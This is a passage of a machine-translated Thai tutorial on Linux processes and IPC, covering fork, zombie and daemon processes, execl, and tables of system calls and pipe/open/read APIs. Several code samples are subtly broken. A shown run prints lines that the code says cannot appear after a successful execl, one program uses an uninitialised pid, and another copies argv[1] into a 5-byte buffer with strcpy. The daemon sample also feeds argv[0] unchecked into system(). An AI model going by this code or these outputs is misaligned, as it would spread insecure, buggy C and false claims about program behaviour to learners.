      printf("Child: pid is %d and ppid is %d\n",getpid(),getppid());
      system("ps -f");
   } else {
      printf("Parent: pid is %d and ppid is %d\n",getpid(),getppid());
      sleep(2);
      exit(0);
   }
   return 0;
}

ขั้นตอนการรวบรวมและดำเนินการ

UID         PID   PPID  C STIME TTY    TIME CMD
4581875  180558      0  0 09:19  ?     00:00:00 sh -c cd /home/cg/root/4581875; 
                                       timeout 10s main
4581875  180564 180558  0 09:19  ?     00:00:00 timeout 10s main
4581875  180565 180564  0 09:19  ?     00:00:00 main
4581875  180566 180565  0 09:19  ?     00:00:00 ps -f
Parent: pid is 180565 and ppid is 180564
UID         PID   PPID  C STIME TTY    TIME CMD
4581875  180567      0  0 09:19  ?     00:00:00 main
4581875  180820 180567  0 09:19  ?     00:00:00 ps -f
Child: pid is 180567 and ppid is 180565
Child: pid is 180567 and ppid is 0

กระบวนการซอมบี้

พูดง่ายๆสมมติว่าคุณมีสองกระบวนการคือกระบวนการหลักและกระบวนการย่อย เป็นความรับผิดชอบของโปรเซสพาเรนต์ในการรอโปรเซสลูกจากนั้นล้างรายการโปรเซสลูกจากตารางกระบวนการ จะเกิดอะไรขึ้นถ้ากระบวนการหลักไม่พร้อมที่จะรอกระบวนการลูกและในระหว่างนี้กระบวนการลูกจะทำงานเสร็จและออกไป ตอนนี้กระบวนการเด็กจะกลายเป็นกระบวนการซอมบี้ แน่นอนกระบวนการซอมบี้จะถูกล้างหลังจากกระบวนการหลักพร้อมแล้ว

ให้เราเข้าใจสิ่งนี้ด้วยความช่วยเหลือของตัวอย่าง

/ * ชื่อไฟล์: zombie_process.c * /

#include<stdio.h>
#include<stdlib.h>

int main() {
   int pid;
   pid = fork();
   if (pid == 0) {
      system("ps -f");
      printf("Child: pid is %d and ppid is %d\n",getpid(),getppid());
      exit(0);
   } else {
      printf("Parent: pid is %d and ppid is %d\n",getpid(),getppid());
      sleep(10);
      system("ps aux|grep Z");
   }
   return 0;
}

ขั้นตอนการรวบรวมและดำเนินการ

UID         PID   PPID  C STIME TTY    TIME CMD
4581875  184946      0  0 09:20  ?     00:00:00 sh -c cd /home/cg/root/4581875; 
                                       timeout 10s main
4581875  184952 184946  0 09:20  ?     00:00:00 timeout 10s main
4581875  184953 184952  0 09:20  ?     00:00:00 main
4581875  184954 184953  0 09:20  ?     00:00:00 main
4581875  184955 184954  0 09:20  ?     00:00:00 ps -f
Child: pid is 184954 and ppid is 184953

กระบวนการ Daemon

กล่าวง่ายๆกระบวนการที่ไม่มีเชลล์หรือเทอร์มินัลใด ๆ ที่เกี่ยวข้องเรียกว่ากระบวนการ daemon ทำไมจึงจำเป็น? นี่คือกระบวนการที่ทำงานอยู่เบื้องหลังเพื่อดำเนินการตามช่วงเวลาที่กำหนดไว้ล่วงหน้าและยังตอบสนองต่อเหตุการณ์บางอย่าง กระบวนการ daemon ไม่ควรมีการโต้ตอบกับผู้ใช้เนื่องจากรันเป็นกระบวนการเบื้องหลัง

กระบวนการภายใน Linux daemon มักจะลงท้ายด้วยตัวอักษร“ d” เช่น Kernel Daemons (ksoftirqd, kblockd, kswapd เป็นต้น), Printing Daemons (cupsd, lpd ฯลฯ ), File Service Daemons (smbd, nmbd เป็นต้น) , daemons ฐานข้อมูลการดูแลระบบ (ypbind, ypserv ฯลฯ ), Daemons ไปรษณีย์อิเล็กทรอนิกส์ (sendmail, popd, smtpd ฯลฯ ), Remote Login และ Command Execution Daemons (sshd, in.telnetd ฯลฯ ), Booting and Configuration Daemons (dhcpd , udevd ฯลฯ ), กระบวนการเริ่มต้น (init), cron daemon, atd daemon ฯลฯ

ตอนนี้ให้เราดูวิธีสร้างกระบวนการภูต ต่อไปนี้เป็นขั้นตอน -

Step 1- สร้างกระบวนการลูก ตอนนี้เรามีสองกระบวนการ - กระบวนการหลักและกระบวนการลูก

โดยปกติลำดับชั้นของกระบวนการคือ SHELL → PARENT PROCESS → CHILD PROCESS

Step 2- ยุติกระบวนการหลักโดยการออก ตอนนี้กระบวนการย่อยกลายเป็นกระบวนการเด็กกำพร้าและถูกยึดครองโดยกระบวนการเริ่มต้น

ตอนนี้ลำดับชั้นคือ INIT PROCESS → CHILD PROCESS

Step 3- การเรียกการเรียกระบบ setsid () จะสร้างเซสชันใหม่หากกระบวนการเรียกไม่ใช่หัวหน้ากลุ่มกระบวนการ ตอนนี้กระบวนการโทรกลายเป็นผู้นำกลุ่มของเซสชันใหม่ กระบวนการนี้จะเป็นกระบวนการเดียวในกลุ่มกระบวนการใหม่นี้และในเซสชันใหม่นี้

Step 4 - ตั้งค่า ID กลุ่มกระบวนการและรหัสเซสชันเป็น PID ของกระบวนการโทร

Step 5 - ปิดตัวอธิบายไฟล์เริ่มต้น (อินพุตมาตรฐานเอาต์พุตมาตรฐานและข้อผิดพลาดมาตรฐาน) ของกระบวนการเนื่องจากเทอร์มินัลและเชลล์ถูกตัดการเชื่อมต่อจากแอปพลิเคชัน

/ * ชื่อไฟล์: daemon_test.c * /

#include<stdio.h>
#include<sys/types.h>
#include<sys/stat.h>
#include<unistd.h>
#include<fcntl.h>
#include<stdlib.h>
#include<string.h>

int main(int argc, char *argv[]) {
   pid_t pid;
   int counter;
   int fd;
   int max_iterations;
   char buffer[100];
   if (argc < 2)
   max_iterations = 5;
   else {
      max_iterations = atoi(argv[1]);
      if ( (max_iterations <= 0) || (max_iterations > 20) )
      max_iterations = 10;
   }
   pid = fork();
   
   // Unable to create child process
   if (pid < 0) {
      perror("fork error\n");
      exit(1);
   }
   
   // Child process
   if (pid == 0) {
      fd = open("/tmp/DAEMON.txt", O_WRONLY|O_CREAT|O_TRUNC, 0644);
      if (fd == -1) {
         perror("daemon txt file open error\n");
         return 1;
      }
      printf("Child: pid is %d and ppid is %d\n", getpid(), getppid());
      printf("\nChild process before becoming session leader\n");
      sprintf(buffer, "ps -ef|grep %s", argv[0]);
      system(buffer);
      setsid();
      printf("\nChild process after becoming session leader\n");
      sprintf(buffer, "ps -ef|grep %s", argv[0]);
      system(buffer);
      close(STDIN_FILENO);
      close(STDOUT_FILENO);
      close(STDERR_FILENO);
   } else {
      printf("Parent: pid is %d and ppid is %d\n", getpid(), getppid());
      printf("Parent: Exiting\n");
      exit(0);
   }
   
   // Executing max_iteration times
   for (counter = 0; counter < max_iterations; counter++) {
      sprintf(buffer, "Daemon process: pid is %d and ppid is %d\n", getpid(), getppid());
      write(fd, buffer, strlen(buffer));
      sleep(2);
   }
   strcpy(buffer, "Done\n");
   write(fd, buffer, strlen(buffer));
   
   // Can't print this as file descriptors are already closed
   printf("DoneDone\n");
   close(fd);
   return 0;
}

Parent: pid is 193524 and ppid is 193523
Parent: Exiting
4581875  193525      0  0 09:23  ?      00:00:00 main
4581875  193526 193525  0 09:23  ?      00:00:00 sh -c ps -ef|grep main
4581875  193528 193526  0 09:23  ?      00:00:00 grep main
4581875  193525      0  0 09:23  ?      00:00:00 main
4581875  193529 193525  0 09:23  ?      00:00:00 sh -c ps -ef|grep main
4581875  193531 193529  0 09:23  ?      00:00:00 grep main

สมมติว่าเรากำลังเรียกใช้โปรแกรมและต้องการเรียกใช้โปรแกรมอื่นจากโปรแกรมปัจจุบัน เป็นไปได้หรือไม่ ทำไมไม่ถ้าเราใช้แนวคิดของการซ้อนทับภาพกระบวนการ ไม่เป็นไร แต่สิ่งที่เกี่ยวกับโปรแกรมที่กำลังทำงานอยู่ในปัจจุบันสามารถรันได้ด้วย เป็นไปได้อย่างไรเนื่องจากเราวางทับโปรแกรมปัจจุบันด้วยโปรแกรมใหม่ จะทำอย่างไรถ้าต้องการเรียกใช้สองโปรแกรมโดยไม่สูญเสียโปรแกรมที่กำลังทำงานอยู่ในปัจจุบันเป็นไปได้หรือไม่? ใช่มันเป็นไปได้

สร้างกระบวนการย่อยเพื่อให้เรามีกระบวนการหลักและกระบวนการลูกที่สร้างขึ้นใหม่ เรากำลังรันโปรแกรมปัจจุบันในกระบวนการหลักอยู่แล้วดังนั้นให้รันกระบวนการที่สร้างขึ้นใหม่ในลูก ด้วยวิธีนี้เราสามารถเรียกใช้โปรแกรมอื่นจากโปรแกรมปัจจุบันได้ ไม่ใช่แค่โปรแกรมเดียว แต่เราสามารถรันโปรแกรมจำนวนเท่าใดก็ได้จากโปรแกรมปัจจุบันโดยการสร้างโปรเซสลูกจำนวนมาก

ให้เราพิจารณาโปรแกรมต่อไปนี้เป็นตัวอย่าง

/ * ชื่อไฟล์: helloworld.c * /

#include<stdio.h>

void main() {
   printf("Hello World\n");
   return;
}

/ * ชื่อไฟล์: execl_test.c * /

#include<stdio.h>
#include<unistd.h>

void main() {
   execl("./helloworld", "./helloworld", (char *)0);
   printf("This wouldn't print\n");
   return;
}

โปรแกรมด้านบนจะซ้อนทับภาพกระบวนการของ execl_test ด้วย helloworld นั่นคือเหตุผลรหัสภาพกระบวนการของ execl_test (printf ()) จะไม่ทำงาน

ขั้นตอนการรวบรวมและดำเนินการ

Hello World

ตอนนี้เราจะเรียกใช้สองโปรแกรมต่อไปนี้จากโปรแกรมหนึ่งนั่นคือ execl_run_two_prgms.c

  • โปรแกรม Hello World (helloworld.c)

  • ในขณะที่โปรแกรมวนซ้ำเพื่อพิมพ์ตั้งแต่ 1 ถึง 10 (while_loop.c)

/ * ชื่อไฟล์: while_loop.c * /

/* Prints numbers from 1 to 10 using while loop */
#include<stdio.h>

void main() {
   int value = 1;
   while (value <= 10) {
      printf("%d\t", value);
      value++;
   }
   printf("\n");
   return;
}

ต่อไปนี้เป็นโปรแกรมเพื่อเรียกใช้สองโปรแกรม (หนึ่งโปรแกรมจากเด็กและอีกโปรแกรมจากผู้ปกครอง)

/ * ชื่อไฟล์: execl_run_two_prgms.c * /

#include<stdio.h>
#include<unistd.h>

void main() {
   int pid;
   pid = fork();
   
   /* Child process */
   if (pid == 0) {
      printf("Child process: Running Hello World Program\n");
      execl("./helloworld", "./helloworld", (char *)0);
      printf("This wouldn't print\n");
   } else { /* Parent process */
      sleep(3);
      printf("Parent process: Running While loop Program\n");
      execl("./while_loop", "./while_loop", (char *)0);
      printf("Won't reach here\n");
   }
   return;
}

Note - วางการโทร sleep () เพื่อให้แน่ใจว่ากระบวนการย่อยและพาเรนต์ทำงานตามลำดับ (อย่าให้ผลลัพธ์ทับซ้อนกัน)

ขั้นตอนการรวบรวมและดำเนินการ

Child process: Running Hello World Program
This wouldn't print
Parent process: Running While loop Program
Won't reach here

ตอนนี้เราจะเรียกใช้สองโปรแกรมจากโปรแกรมหนึ่งเช่น execl_run_two_prgms.c โปรแกรมเดียวกับด้านบน แต่มีอาร์กิวเมนต์บรรทัดคำสั่ง ดังนั้นเรากำลังเรียกใช้สองโปรแกรมคือ helloworld.c ในกระบวนการลูกและโปรแกรม while_loop.c ในกระบวนการหลัก มีดังต่อไปนี้ -

  • โปรแกรม Hello World (helloworld.c)

  • ในขณะที่โปรแกรมวนซ้ำเพื่อพิมพ์จาก 1 ถึง num_times_str ตามอาร์กิวเมนต์บรรทัดคำสั่ง (while_loop.c)

โปรแกรมนี้ดำเนินการอย่างกว้าง ๆ ดังต่อไปนี้ -

  • สร้างกระบวนการย่อย

  • กระบวนการย่อยดำเนินการโปรแกรม helloworld.c

  • กระบวนการต้นทางรันโปรแกรม while_loop.c ส่งผ่านค่าอาร์กิวเมนต์บรรทัดคำสั่งเป็นอาร์กิวเมนต์ไปยังโปรแกรม หากไม่ผ่านอาร์กิวเมนต์บรรทัดคำสั่งค่าดีฟอลต์จะถือเป็น 10 มิฉะนั้นจะใช้ค่าอาร์กิวเมนต์ที่กำหนด ค่าอาร์กิวเมนต์ควรเป็นตัวเลข รหัสจะไม่สามารถตรวจสอบได้หากระบุเป็นตัวอักษร

/ * ชื่อไฟล์: execl_run_two_prgms.c * /

#include<stdio.h>
#include<string.h>
#include<unistd.h>

void main(int argc, char *argv[0]) {
   int pid;
   int err;
   int num_times;
   char num_times_str[5];
   
   /* In no command line arguments are passed, then loop maximum count taken as 10 */
   if (argc == 1) {
      printf("Taken loop maximum as 10\n");
      num_times = 10;
      sprintf(num_times_str, "%d", num_times);
   } else {
      strcpy(num_times_str, argv[1]);
      printf("num_times_str is %s\n", num_times_str);
      pid = fork();
   }
   
   /* Child process */
   if (pid == 0) {
      printf("Child process: Running Hello World Program\n");
      err = execl("./helloworld", "./helloworld", (char *)0);
      printf("Error %d\n", err);
      perror("Execl error: ");
      printf("This wouldn't print\n");
   } else { /* Parent process */
      sleep(3);
      printf("Parent process: Running While loop Program\n");
      execl("./while_loop", "./while_loop", (char *)num_times_str, (char *)0);
      printf("Won't reach here\n");
   }
   return;
}

ต่อไปนี้เป็นโปรแกรม helloworld.c ที่เรียกจากกระบวนการลูกของโปรแกรม execl_run_two_prgms.c

/ * ชื่อไฟล์: helloworld.c * /

#include<stdio.h>

void main() {
   printf("Hello World\n");
   return;
}

ต่อไปนี้เป็นโปรแกรม while_loop.c ที่เรียกจากกระบวนการหลักของโปรแกรม execl_run_two_prgms.c อาร์กิวเมนต์ของโปรแกรมนี้ถูกส่งผ่านจากโปรแกรมที่รันเช่น execl_run_two_prgms.c

/ * ชื่อไฟล์: while_loop.c * /

#include<stdio.h>

void main(int argc, char *argv[]) {
   int start_value = 1;
   int end_value;
   if (argc == 1)
   end_value = 10;
   else
   end_value = atoi(argv[1]);
   printf("Argv[1] is %s\n", argv[1]);
   while (start_value <= end_value) {
      printf("%d\t", start_value);
      start_value++;
   }
   printf("\n");
   return;
}

ขั้นตอนการรวบรวมและดำเนินการ

Taken loop maximum as 10
num_times_str is 10
Child process: Running Hello World Program
Hello World
Parent process: Running While loop Program
Argv[1] is 10
1 2 3 4 5 6 7 8 9 10
Taken loop maximum as 15
num_times_str is 15
Child process: Running Hello World Program
Hello World
Parent process: Running While loop Program
Argv[1] is 15
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15

ตอนนี้ให้เราดูฟังก์ชันไลบรารีที่เกี่ยวข้องกับภาพซ้อนทับ

#include<unistd.h>

int execl(const char *path, const char *arg, ...);

ฟังก์ชันนี้จะซ้อนทับอิมเมจกระบวนการทำงานปัจจุบันด้วยกระบวนการใหม่ดังที่กล่าวไว้ในอาร์กิวเมนต์พา ธ และอาร์กิวเมนต์ หากอาร์กิวเมนต์ใด ๆ จำเป็นต้องส่งไปยังอิมเมจกระบวนการใหม่สิ่งนั้นจะถูกส่งผ่านอาร์กิวเมนต์ "อาร์กิวเมนต์" และอาร์กิวเมนต์สุดท้ายควรเป็นโมฆะ

ฟังก์ชันนี้จะส่งคืนค่าในกรณีที่เกิดข้อผิดพลาดเท่านั้น กระบวนการซ้อนภาพที่เกี่ยวข้องกับการโทรมีดังที่กล่าวไว้ด้านล่าง -

int execl(const char *path, const char *arg, ...);
int execlp(const char *file, const char *arg, ...);
int execle(const char *path, const char *arg, ..., char * const envp[]);
int execv(const char *path, char *const argv[]);
int execvp(const char *file, char *const argv[]);
int execvpe(const char *file, char *const argv[], char *const envp[]);

การเรียกเหล่านี้จะกล่าวถึงการส่งผ่านอาร์กิวเมนต์บรรทัดคำสั่ง (argv []) ตัวแปรสภาพแวดล้อม (envp []) และพารามิเตอร์อื่น ๆ

ตารางต่อไปนี้แสดงการเรียกระบบต่างๆพร้อมกับคำอธิบาย

ประเภท ระบบโทร คำอธิบาย
ทั่วไป เปิด () การเรียกระบบนี้จะเปิดไฟล์ที่มีอยู่แล้วหรือสร้างและเปิดไฟล์ใหม่
ทั่วไป สร้าง () สร้างและเปิดไฟล์ใหม่
ทั่วไป อ่าน () อ่านเนื้อหาของไฟล์ในบัฟเฟอร์ที่ต้องการ
ทั่วไป เขียน () เขียนเนื้อหาของบัฟเฟอร์ลงในไฟล์
ทั่วไป ปิด () ปิดไฟล์ descriptor
ทั่วไป สถิติ () ให้ข้อมูลเกี่ยวกับไฟล์
ท่อ ท่อ () สร้างไปป์สำหรับการสื่อสารซึ่งส่งคืนตัวบอกไฟล์สองตัวสำหรับการอ่านและเขียน
ชื่อว่า Pipes หรือ Fifo mknod () สร้างไฟล์อุปกรณ์หน่วยความจำหรือไฟล์พิเศษเพื่อสร้าง FIFO
ชื่อว่า Pipes หรือ Fifo mkfifo () สร้าง FIFO ใหม่
หน่วยความจำที่ใช้ร่วมกัน shmget () สร้างเซ็กเมนต์หน่วยความจำแบบแบ่งใช้ใหม่หรือรับตัวระบุของเซ็กเมนต์ที่มีอยู่
หน่วยความจำที่ใช้ร่วมกัน shmat () แนบเซ็กเมนต์หน่วยความจำแบบแบ่งใช้และทำให้เซ็กเมนต์เป็นส่วนหนึ่งของหน่วยความจำเสมือนของกระบวนการเรียก
หน่วยความจำที่ใช้ร่วมกัน shmdt () แยกเซ็กเมนต์หน่วยความจำแบบแบ่งใช้
หน่วยความจำที่ใช้ร่วมกัน shmctl () ดำเนินการควบคุมสำหรับหน่วยความจำแบบแบ่งใช้ การดำเนินการควบคุมทั่วไปสำหรับหน่วยความจำแบบแบ่งใช้เพียงไม่กี่รายการกำลังลบเซ็กเมนต์หน่วยความจำแบบแบ่งใช้ (IPC_RMID) รับข้อมูลของหน่วยความจำแบบแบ่งใช้ (IPC_STAT) และอัปเดตค่าใหม่ของหน่วยความจำแบบแบ่งใช้ที่มีอยู่ (IPC_SET)
คิวข้อความ msgget () สร้างคิวข้อความใหม่หรือเข้าถึงคิวข้อความที่มีอยู่แล้วและรับตัวจัดการหรือตัวระบุเพื่อดำเนินการกับคิวข้อความเช่นการส่งข้อความไปยังคิวและรับข้อความ / วินาทีจากคิว
คิวข้อความ msgsnd () ส่งข้อความไปยังคิวข้อความที่ต้องการพร้อมหมายเลขประจำตัวที่ต้องการ
คิวข้อความ msgrcv () รับข้อความจากคิวข้อความ ตามค่าเริ่มต้นนี่คือการดำเนินการรอไม่สิ้นสุดหมายความว่าการโทรจะถูกบล็อกจนกว่าจะได้รับข้อความ
คิวข้อความ msgctl () ดำเนินการควบคุมสำหรับคิวข้อความ การดำเนินการควบคุมทั่วไปเพียงไม่กี่รายการสำหรับคิวข้อความกำลังลบคิวข้อความ (IPC_RMID) รับข้อมูลของคิวข้อความ (IPC_STAT) และอัปเดตค่าใหม่ของคิวข้อความที่มีอยู่ (IPC_SET)
Semaphores เซมเก็ต () สร้างสัญญาณใหม่หรือรับตัวระบุของเซมาฟอร์ที่มีอยู่ Semaphores ใช้เพื่อทำการซิงโครไนซ์ระหว่าง IPC ต่างๆที่ทำงานบนวัตถุเดียวกัน
Semaphores semop () ดำเนินการเซมาฟอร์กับค่าเซมาฟอร์ การดำเนินการเซมาฟอร์พื้นฐานคือการรับหรือปลดล็อกบนเซมาฟอร์
Semaphores semctl () ดำเนินการควบคุมสำหรับเซมาฟอร์ การดำเนินการควบคุมทั่วไปบางส่วนสำหรับเซมาฟอร์กำลังลบเซมาฟอร์ (IPC_RMID) รับข้อมูลของเซมาฟอร์ (IPC_STAT) และอัปเดตค่าใหม่ของเซมาฟอร์ที่มีอยู่ (IPC_SET)
สัญญาณ สัญญาณ () การตั้งค่าการจัดการสัญญาณ (หมายเลขสัญญาณ) และตัวจัดการสัญญาณ ในอีกแง่หนึ่งการลงทะเบียนรูทีนซึ่งจะดำเนินการเมื่อสัญญาณดังกล่าวเพิ่มขึ้น
สัญญาณ ซิกแอคชั่น () เช่นเดียวกับสัญญาณ () การตั้งค่าการจัดการของสัญญาณกล่าวคือดำเนินการบางอย่างตามตัวจัดการสัญญาณที่ลงทะเบียนหลังจากได้รับสัญญาณที่ลงทะเบียนแล้ว การเรียกระบบนี้รองรับการควบคุมสัญญาณที่ละเอียดยิ่งขึ้น () เช่นการปิดกั้นสัญญาณบางอย่างการเรียกคืนการทำงานของสัญญาณกลับสู่สถานะเริ่มต้นหลังจากเรียกตัวจัดการสัญญาณการให้ข้อมูลเช่นเวลาที่ใช้งานของผู้ใช้และระบบรหัสกระบวนการของกระบวนการส่งเป็นต้น
การแมปหน่วยความจำ mmap () การแมปไฟล์ลงในหน่วยความจำ เมื่อแมปลงในหน่วยความจำแล้วการเข้าถึงไฟล์ก็ทำได้ง่ายเหมือนกับการเข้าถึงข้อมูลโดยใช้ที่อยู่และด้วยวิธีนี้การโทรไม่แพงเหมือนการโทรจากระบบ
การแมปหน่วยความจำ munmap () ยกเลิกการแมปไฟล์ที่แมปจากหน่วยความจำ

ตารางต่อไปนี้แสดงความแตกต่างระหว่าง System V IPC และ POSIX IPC

ระบบ V. POSIX
AT & T เปิดตัว (1983) รูปแบบใหม่ของสิ่งอำนวยความสะดวก IPC สามรูปแบบ ได้แก่ คิวข้อความหน่วยความจำที่ใช้ร่วมกันและเซมาโฟร์ มาตรฐานอินเทอร์เฟซระบบปฏิบัติการแบบพกพาที่กำหนดโดย IEEE เพื่อกำหนดส่วนต่อประสานการเขียนโปรแกรมแอปพลิเคชัน (API) POSIX ครอบคลุม IPC ทั้งสามรูปแบบ
SYSTEM V IPC ครอบคลุมกลไก IPC ทั้งหมด ได้แก่ ไปป์ชื่อไปป์คิวข้อความสัญญาณเซมาโฟเรสและหน่วยความจำที่ใช้ร่วมกัน นอกจากนี้ยังครอบคลุมซ็อกเก็ตซ็อกเก็ตและ Unix Domain แนวคิดพื้นฐานเกือบทั้งหมดเหมือนกับ System V แตกต่างกันเพียงแค่อินเทอร์เฟซเท่านั้น
อินเทอร์เฟซหน่วยความจำที่ใช้ร่วมกันเรียกใช้ shmget (), shmat (), shmdt (), shmctl () อินเทอร์เฟซหน่วยความจำที่ใช้ร่วมกันเรียกใช้ shm_open (), mmap (), shm_unlink ()
อินเทอร์เฟซคิวข้อความเรียก msgget (), msgsnd (), msgrcv (), msgctl () อินเทอร์เฟซคิวข้อความเรียก mq_open (), mq_send (), mq_receive (), mq_unlink ()
Semaphore Interface เรียก semget (), semop (), semctl () Semaphore Interface เรียก Semaphores sem_open (), sem_close (), sem_unlink (), sem_post (), sem_wait (), sem_trywait (), sem_timedwait (), sem_getvalue () เซมาโฟเรสที่ไม่มีชื่อหรือหน่วยความจำตาม sem_init (), sem_post (), sem_wait (), sem_getvalue (), sem_destroy ()
ใช้คีย์และตัวระบุเพื่อระบุอ็อบเจ็กต์ IPC ใช้ชื่อและตัวบอกไฟล์เพื่อระบุอ็อบเจ็กต์ IPC
NA POSIX Message Queues สามารถตรวจสอบได้โดยใช้ select (), โพล () และ epoll API
เสนอการโทร msgctl () จัดเตรียมฟังก์ชัน (mq_getattr () และ mq_setattr ()) เพื่อเข้าถึงหรือตั้งค่าแอตทริบิวต์ 11. IPC - System V & POSIX
NA ปลอดภัยหลายเธรด ครอบคลุมฟังก์ชันการซิงโครไนซ์เธรดเช่นการล็อก mutex ตัวแปรตามเงื่อนไขการล็อกการอ่าน - เขียนเป็นต้น
NA เสนอคุณสมบัติการแจ้งเตือนบางอย่างสำหรับคิวข้อความ (เช่น mq_notify ())
ต้องการการเรียกระบบเช่น shmctl () คำสั่ง (ipcs, ipcrm) เพื่อดำเนินการสถานะ / การควบคุม ออบเจ็กต์หน่วยความจำที่ใช้ร่วมกันสามารถตรวจสอบและจัดการได้โดยใช้การเรียกระบบเช่น fstat (), fchmod ()
ขนาดของเซ็กเมนต์หน่วยความจำที่ใช้ร่วมกัน System V ได้รับการแก้ไข ณ เวลาที่สร้าง (ผ่าน shmget ()) เราสามารถใช้ ftruncate () เพื่อปรับขนาดของวัตถุต้นแบบจากนั้นสร้างการแมปใหม่โดยใช้ munmap () และ mmap () (หรือ mremap เฉพาะของ Linux ())

ไปป์เป็นสื่อกลางในการสื่อสารระหว่างสองกระบวนการขึ้นไปที่เกี่ยวข้องหรือสัมพันธ์กัน อาจเป็นได้ทั้งภายในกระบวนการเดียวหรือการสื่อสารระหว่างเด็กและกระบวนการหลัก การสื่อสารสามารถทำได้หลายระดับเช่นการสื่อสารระหว่างผู้ปกครองเด็กและผู้ปกครองเด็กเป็นต้นการสื่อสารทำได้โดยการเขียนกระบวนการหนึ่งลงในท่อและการอ่านอื่น ๆ จากท่อ เพื่อให้บรรลุการเรียกระบบท่อให้สร้างไฟล์สองไฟล์ไฟล์หนึ่งเพื่อเขียนลงในไฟล์และอีกไฟล์หนึ่งเพื่ออ่านจากไฟล์

กลไกของท่อสามารถดูได้จากสถานการณ์แบบเรียลไทม์เช่นการเติมน้ำลงในท่อลงในภาชนะบางอย่างพูดถังและมีคนหยิบออกมาพูดพร้อมกับแก้ว ขั้นตอนการเติมไม่มีอะไรเลยนอกจากการเขียนลงไปในท่อและขั้นตอนการอ่านก็ไม่มีอะไรนอกจากการดึงข้อมูลจากท่อ นี่หมายความว่าเอาต์พุตหนึ่ง (น้ำ) เป็นอินพุตสำหรับอีกตัวหนึ่ง (ถัง)

#include<unistd.h>

int pipe(int pipedes[2]);

การเรียกระบบนี้จะสร้างท่อสำหรับการสื่อสารทางเดียวกล่าวคือสร้างตัวบอกสองตัวตัวแรกเชื่อมต่อเพื่ออ่านจากท่อและอีกอันเชื่อมต่อเพื่อเขียนลงในท่อ

Descriptor pipedes [0] ใช้สำหรับการอ่านและ pipedes [1] สำหรับการเขียน สิ่งที่เขียนลงใน pipedes [1] สามารถอ่านได้จาก pipedes [0]

การโทรนี้จะคืนค่าเป็นศูนย์เมื่อสำเร็จและ -1 ในกรณีที่ล้มเหลว หากต้องการทราบสาเหตุของความล้มเหลวให้ตรวจสอบด้วยฟังก์ชัน errno variable หรือ perror ()

#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>

int open(const char *pathname, int flags);
int open(const char *pathname, int flags, mode_t mode);

แม้ว่าการดำเนินการพื้นฐานสำหรับไฟล์จะอ่านและเขียนได้ แต่ก็จำเป็นต้องเปิดไฟล์ก่อนดำเนินการและปิดไฟล์หลังจากเสร็จสิ้นการดำเนินการที่ต้องการ โดยปกติแล้วโดยค่าเริ่มต้นตัวบอก 3 ตัวจะเปิดขึ้นสำหรับทุกกระบวนการซึ่งใช้สำหรับอินพุต (อินพุตมาตรฐาน - stdin) เอาต์พุต (เอาต์พุตมาตรฐาน - stdout) และข้อผิดพลาด (ข้อผิดพลาดมาตรฐาน - stderr) ที่มีตัวบอกไฟล์ 0, 1 และ 2 ตามลำดับ

การเรียกระบบนี้จะส่งคืน file descriptor ที่ใช้สำหรับการดำเนินการไฟล์เพิ่มเติมของ read / write / find (lseek) โดยปกติแล้ว file descriptors จะเริ่มจาก 3 และเพิ่มขึ้นทีละหนึ่งหมายเลขเมื่อเปิดไฟล์

อาร์กิวเมนต์ที่ส่งไปยังการเรียกระบบเปิดคือชื่อพา ธ (พา ธ สัมพัทธ์หรือพา ธ สัมบูรณ์) แฟล็กที่กล่าวถึงวัตถุประสงค์ของการเปิดไฟล์ (เช่นเปิดเพื่ออ่าน O_RDONLY เพื่อเขียน O_WRONLY เพื่ออ่านและเขียน O_RDWR เพื่อต่อท้ายไฟล์ที่มีอยู่ O_APPEND เพื่อสร้างไฟล์หากไม่มี O_CREAT และอื่น ๆ ) และโหมดที่ต้องการให้สิทธิ์ในการอ่าน / เขียน / ดำเนินการสำหรับผู้ใช้หรือเจ้าของ / กลุ่ม / อื่น ๆ โหมดสามารถระบุได้ด้วยสัญลักษณ์

อ่าน - 4 เขียน - 2 และดำเนินการ - 1

ตัวอย่างเช่น: ค่าฐานแปด (เริ่มต้นด้วย 0), 0764 หมายความว่าเจ้าของมีสิทธิ์ในการอ่านเขียนและดำเนินการกลุ่มมีสิทธิ์ในการอ่านและเขียนอื่น ๆ มีสิทธิ์ในการอ่าน นอกจากนี้ยังสามารถแสดงเป็น S_IRWXU | S_IRGRP | S_IWGRP | S_IROTH ซึ่งแสดงนัยหรือการทำงานของ 0700 | 0040 | 0020 | 0004 → 0764

การเรียกระบบนี้เมื่อประสบความสำเร็จจะส่งคืนรหัสตัวอธิบายไฟล์ใหม่และ -1 ในกรณีที่เกิดข้อผิดพลาด สาเหตุของข้อผิดพลาดสามารถระบุได้ด้วยตัวแปร errno หรือฟังก์ชัน perror ()

#include<unistd.h>

int close(int fd)

การปิดการเรียกระบบข้างต้นได้เปิดตัวอธิบายไฟล์แล้ว นี่หมายความว่าไฟล์ไม่ได้ใช้งานอีกต่อไปและทรัพยากรที่เกี่ยวข้องสามารถนำกลับมาใช้ใหม่ได้โดยกระบวนการอื่น ๆ การเรียกระบบนี้จะคืนค่าเป็นศูนย์เมื่อสำเร็จและ -1 ในกรณีที่เกิดข้อผิดพลาด สาเหตุของข้อผิดพลาดสามารถระบุได้ด้วยตัวแปร errno หรือฟังก์ชัน perror ()

#include<unistd.h>

ssize_t read(int fd, void *buf, size_t count)

การเรียกระบบข้างต้นคือการอ่านจากไฟล์ที่ระบุพร้อมอาร์กิวเมนต์ของ file descriptor fd บัฟเฟอร์ที่เหมาะสมพร้อมหน่วยความจำที่จัดสรร (แบบคงที่หรือแบบไดนามิก) และขนาดของบัฟเฟอร์

รหัสตัวอธิบายไฟล์คือการระบุไฟล์ที่เกี่ยวข้องซึ่งจะส่งคืนหลังจากเรียกการเรียกระบบ open () หรือ pipe () ต้องเปิดไฟล์ก่อนอ่านจากไฟล์ จะเปิดขึ้นโดยอัตโนมัติในกรณีที่เรียกการเรียกระบบ pipe ()

การเรียกนี้จะส่งคืนจำนวนไบต์ที่อ่าน (หรือเป็นศูนย์ในกรณีที่พบจุดสิ้นสุดของไฟล์) เมื่อสำเร็จและ -1 ในกรณีที่ล้มเหลว ไบต์ที่ส่งคืนอาจมีขนาดเล็กกว่าจำนวนไบต์ที่ร้องขอในกรณีที่ไม่มีข้อมูลหรือปิดไฟล์ มีการกำหนดหมายเลขข้อผิดพลาดที่เหมาะสมในกรณีที่เกิดความล้มเหลว

หากต้องการทราบสาเหตุของความล้มเหลวให้ตรวจสอบด้วยฟังก์ชัน errno variable หรือ perror ()

#include<unistd.h>

